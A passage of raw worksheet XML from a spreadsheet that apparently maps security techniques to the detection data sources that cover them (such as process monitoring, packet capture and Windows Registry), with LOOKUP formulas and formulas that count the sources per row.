      <c r="D22" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E22" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="13"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A23" s="16" t="s">
        <v>44</v>
      </c>
      <c r="B23" s="13" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D23" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E23" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F23" s="13"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A24" s="16" t="s">
        <v>46</v>
      </c>
      <c r="B24" s="13" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D24" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E24" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F24" s="13"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A25" s="16" t="s">
        <v>47</v>
      </c>
      <c r="B25" s="13" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D25" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E25" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F25" s="13"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A26" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B26" s="13" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D26" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="13"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A27" s="16" t="s">
        <v>49</v>
      </c>
      <c r="B27" s="13" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D27" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E27" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F27" s="13"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A28" s="16" t="s">
        <v>50</v>
      </c>
      <c r="B28" s="13"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17" t="s">
        <v>51</v>
      </c>
      <c r="D28" s="13">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E28" s="13">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F28" s="13"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A29" s="16" t="s">
        <v>52</v>
      </c>
      <c r="B29" s="13" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>53</v>
      </c>
      <c r="D29" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E29" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F29" s="13"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A30" s="16" t="s">
        <v>54</v>
      </c>
      <c r="B30" s="13" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D30" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E30" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F30" s="13"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A31" s="16" t="s">
        <v>55</v>
      </c>
      <c r="B31" s="13" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>56</v>
      </c>
      <c r="D31" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E31" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F31" s="13"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A32" s="16" t="s">
        <v>57</v>
      </c>
      <c r="B32" s="13" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>58</v>
      </c>
      <c r="D32" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="13"/>
      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A33" s="16" t="s">
        <v>59</v>
      </c>
      <c r="B33" s="13" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>60</v>
      </c>
      <c r="D33" s="13">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E33" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F33" s="13"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A34" s="16" t="s">
        <v>61</v>
      </c>
      <c r="B34" s="13" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>62</v>
      </c>
      <c r="D34" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E34" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F34" s="13"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A35" s="16" t="s">
        <v>63</v>
      </c>
      <c r="B35" s="13" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D35" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E35" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F35" s="13"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A36" s="16" t="s">
        <v>64</v>
      </c>
      <c r="B36" s="13" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C36" s="17" t="s">
        <v>15</v>
      </c>
      <c r="D36" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E36" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F36" s="13"/>
      <c r="G36" s="19"/>
    </row>
    <row r="37" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A37" s="16" t="s">
        <v>65</v>
      </c>
      <c r="B37" s="13" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Binary file metadata</v>
      </c>
      <c r="C37" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D37" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E37" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F37" s="13"/>
      <c r="G37" s="19"/>
    </row>
    <row r="38" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A38" s="16" t="s">
        <v>66</v>
      </c>
      <c r="B38" s="13" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C38" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D38" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E38" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F38" s="13"/>
      <c r="G38" s="19"/>
    </row>
    <row r="39" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A39" s="16" t="s">
        <v>68</v>
      </c>
      <c r="B39" s="13" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C39" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D39" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E39" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F39" s="13"/>
      <c r="G39" s="19"/>
    </row>
    <row r="40" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A40" s="16" t="s">
        <v>69</v>
      </c>
      <c r="B40" s="13" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C40" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D40" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E40" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F40" s="13"/>
      <c r="G40" s="19"/>
    </row>
    <row r="41" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A41" s="16" t="s">
        <v>71</v>
      </c>
      <c r="B41" s="13" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
      <c r="C41" s="17" t="s">
        <v>72</v>
      </c>
      <c r="D41" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E41" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F41" s="13"/>
      <c r="G41" s="19"/>
    </row>
    <row r="42" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A42" s="16" t="s">
        <v>73</v>
      </c>
      <c r="B42" s="13" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C42" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D42" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E42" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F42" s="13"/>
      <c r="G42" s="19"/>
    </row>
    <row r="43" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A43" s="16" t="s">
        <v>75</v>
      </c>
      <c r="B43" s="13" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C43" s="17" t="s">
        <v>13</v>
      </c>
      <c r="D43" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E43" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F43" s="13"/>
      <c r="G43" s="19"/>
    </row>
    <row r="44" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A44" s="16" t="s">
        <v>76</v>
      </c>
      <c r="B44" s="13" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C44" s="17" t="s">
        <v>77</v>
      </c>
      <c r="D44" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E44" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F44" s="13"/>
      <c r="G44" s="19"/>
    </row>
    <row r="45" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A45" s="16" t="s">
        <v>78</v>
      </c>
      <c r="B45" s="13" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Services,Process command-line parameters</v>
      </c>
      <c r="C45" s="17" t="s">
        <v>41</v>
      </c>
      <c r="D45" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E45" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F45" s="13"/>
      <c r="G45" s="19"/>
    </row>
    <row r="46" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A46" s="16" t="s">
        <v>79</v>
      </c>
      <c r="B46" s="13" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata</v>
      </c>
      <c r="C46" s="17">
        <v>100</v>
      </c>
      <c r="D46" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E46" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F46" s="13"/>
      <c r="G46" s="19"/>
    </row>
    <row r="47" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A47" s="16" t="s">
        <v>80</v>
      </c>
      <c r="B47" s="13" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C47" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D47" s="13">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E47" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F47" s="13"/>
      <c r="G47" s="19"/>
    </row>
    <row r="48" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A48" s="16" t="s">
        <v>81</v>
      </c>
      <c r="B48" s="13" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C48" s="17" t="s">
        <v>58</v>
      </c>
      <c r="D48" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E48" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F48" s="13"/>
      <c r="G48" s="19"/>
    </row>
    <row r="49" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A49" s="16" t="s">
        <v>82</v>
      </c>
      <c r="B49" s="13" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
      <c r="C49" s="17" t="s">
        <v>83</v>
      </c>
      <c r="D49" s="13">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E49" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F49" s="13"/>
      <c r="G49" s="19"/>
    </row>
    <row r="50" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A50" s="16" t="s">
        <v>84</v>
      </c>
      <c r="B50" s="13" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C50" s="17" t="s">
        <v>85</v>
      </c>
      <c r="D50" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E50" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F50" s="13"/>
      <c r="G50" s="19"/>
    </row>
    <row r="51" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A51" s="16" t="s">
        <v>86</v>
      </c>
      <c r="B51" s="13" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C51" s="17" t="s">
        <v>39</v>
      </c>
      <c r="D51" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E51" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F51" s="13"/>
      <c r="G51" s="19"/>
    </row>
    <row r="52" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A52" s="16" t="s">
        <v>87</v>
      </c>
      <c r="B52" s="13" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C52" s="17" t="s">
        <v>26</v>
      </c>
      <c r="D52" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E52" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F52" s="13"/>
      <c r="G52" s="19"/>
    </row>
    <row r="53" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A53" s="16" t="s">
        <v>88</v>
      </c>
      <c r="B53" s="13" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Data loss prevention,File monitoring</v>
      </c>
      <c r="C53" s="17" t="s">
        <v>89</v>
      </c>
      <c r="D53" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E53" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F53" s="13"/>
      <c r="G53" s="19"/>
    </row>
    <row r="54" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A54" s="16" t="s">
        <v>90</v>
      </c>
      <c r="B54" s="13" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C54" s="17" t="s">
        <v>91</v>
      </c>
      <c r="D54" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E54" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F54" s="13"/>
      <c r="G54" s="19"/>
    </row>
    <row r="55" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A55" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B55" s="13" t="str">
        <f>LOOKUP(A55,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C55" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D55" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E55" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F55" s="13"/>
      <c r="G55" s="19"/>
    </row>
    <row r="56" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A56" s="16" t="s">
        <v>94</v>
      </c>
      <c r="B56" s="13" t="str">
        <f>LOOKUP(A56,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</v>
      </c>
      <c r="C56" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D56" s="13">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="E56" s="13">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F56" s="13"/>
      <c r="G56" s="19"/>
    </row>
    <row r="57" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A57" s="16" t="s">
        <v>96</v>
      </c>
      <c r="B57" s="13" t="str">
        <f>LOOKUP(A57,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Kernel drivers,Process monitoring,API monitoring</v>
      </c>
      <c r="C57" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D57" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E57" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F57" s="13"/>
      <c r="G57" s="19"/>
    </row>
    <row r="58" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A58" s="16" t="s">
        <v>98</v>
      </c>
      <c r="B58" s="13" t="str">
        <f>LOOKUP(A58,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C58" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D58" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E58" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F58" s="13"/>
      <c r="G58" s="19"/>
    </row>
    <row r="59" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A59" s="16" t="s">
        <v>99</v>
      </c>
      <c r="B59" s="13" t="str">
        <f>LOOKUP(A59,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,Windows Registry</v>
      </c>
      <c r="C59" s="17" t="s">
        <v>100</v>
      </c>
      <c r="D59" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E59" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F59" s="13"/>
      <c r="G59" s="19"/>
    </row>
    <row r="60" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A60" s="16" t="s">
        <v>101</v>
      </c>
      <c r="B60" s="13" t="str">
        <f>LOOKUP(A60,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C60" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D60" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E60" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F60" s="13"/>
      <c r="G60" s="19"/>
    </row>
    <row r="61" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A61" s="16" t="s">
        <v>102</v>
      </c>
      <c r="B61" s="13" t="str">
        <f>LOOKUP(A61,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring</v>
      </c>
      <c r="C61" s="17" t="s">
        <v>103</v>
      </c>
      <c r="D61" s="13">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E61" s="13">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F61" s="13"/>
      <c r="G61" s="19"/>
    </row>
    <row r="62" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A62" s="16" t="s">
        <v>104</v>
      </c>
      <c r="B62" s="13" t="str">
        <f>LOOKUP(A62,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</v>
      </c>
      <c r="C62" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D62" s="13">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E62" s="13">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F62" s="13"/>
      <c r="G62" s="19"/>
    </row>
    <row r="63" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A63" s="16" t="s">
        <v>105</v>
      </c>
      <c r="B63" s="13" t="str">
        <f>LOOKUP(A63,'REF-DataSources'!A:C)</f>
        <v>System calls</v>
      </c>
      <c r="C63" s="17">
        <v>100</v>
      </c>
      <c r="D63" s="13">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E63" s="13">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F63" s="13"/>
      <c r="G63" s="19"/>
    </row>
    <row r="64" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A64" s="16" t="s">
        <v>106</v>
      </c>
      <c r="B64" s="13" t="str">
        <f>LOOKUP(A64,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C64" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D64" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E64" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F64" s="13"/>
      <c r="G64" s="19"/>
    </row>
    <row r="65" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A65" s="16" t="s">
        <v>108</v>
      </c>
      <c r="B65" s="13" t="str">
        <f>LOOKUP(A65,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C65" s="17" t="s">
        <v>109</v>
      </c>
      <c r="D65" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E65" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F65" s="13"/>
      <c r="G65" s="19"/>
    </row>
    <row r="66" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A66" s="16" t="s">
        <v>110</v>
      </c>
      <c r="B66" s="13" t="str">
        <f>LOOKUP(A66,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C66" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D66" s="13">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E66" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F66" s="13"/>
      <c r="G66" s="19"/>
    </row>
    <row r="67" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A67" s="16" t="s">
        <v>111</v>
      </c>
      <c r="B67" s="13" t="str">
        <f>LOOKUP(A67,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C67" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D67" s="13">
        <f t="shared" ref="D67:D130" si="3">LEN(TRIM(B67))-LEN(SUBSTITUTE(TRIM(B67),",",""))+1</f>
        <v>5</v>
      </c>
      <c r="E67" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F67" s="13"/>
      <c r="G67" s="19"/>
    </row>
    <row r="68" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A68" s="16" t="s">
        <v>112</v>
      </c>
      <c r="B68" s="13" t="str">
        <f>LOOKUP(A68,'REF-DataSources'!A:C)</f>
        <v>API monitoring,MBR,VBR</v>
      </c>
      <c r="C68" s="17" t="s">
        <v>113</v>
      </c>
      <c r="D68" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E68" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F68" s="13"/>
      <c r="G68" s="19"/>
    </row>
    <row r="69" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A69" s="16" t="s">
        <v>114</v>
      </c>
      <c r="B69" s="13" t="str">
        <f>LOOKUP(A69,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,Application logs</v>
      </c>
      <c r="C69" s="17" t="s">
        <v>115</v>
      </c>
      <c r="D69" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E69" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F69" s="13"/>
      <c r="G69" s="19"/>
    </row>
    <row r="70" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A70" s="16" t="s">
        <v>116</v>
      </c>
      <c r="B70" s="13" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C70" s="17" t="s">
        <v>41</v>
      </c>
      <c r="D70" s="13">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
      <c r="E70" s="13">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F70" s="13"/>
      <c r="G70" s="19"/>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A71" s="16" t="s">
        <v>117</v>
      </c>
      <c r="B71" s="13" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,API monitoring,Windows event logs</v>
      </c>
      <c r="C71" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D71" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E71" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F71" s="13"/>
      <c r="G71" s="19"/>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A72" s="16" t="s">
        <v>118</v>
      </c>
      <c r="B72" s="13" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C72" s="17" t="s">
        <v>119</v>
      </c>
      <c r="D72" s="13">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
      <c r="E72" s="13">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F72" s="13"/>
      <c r="G72" s="19"/>
    </row>
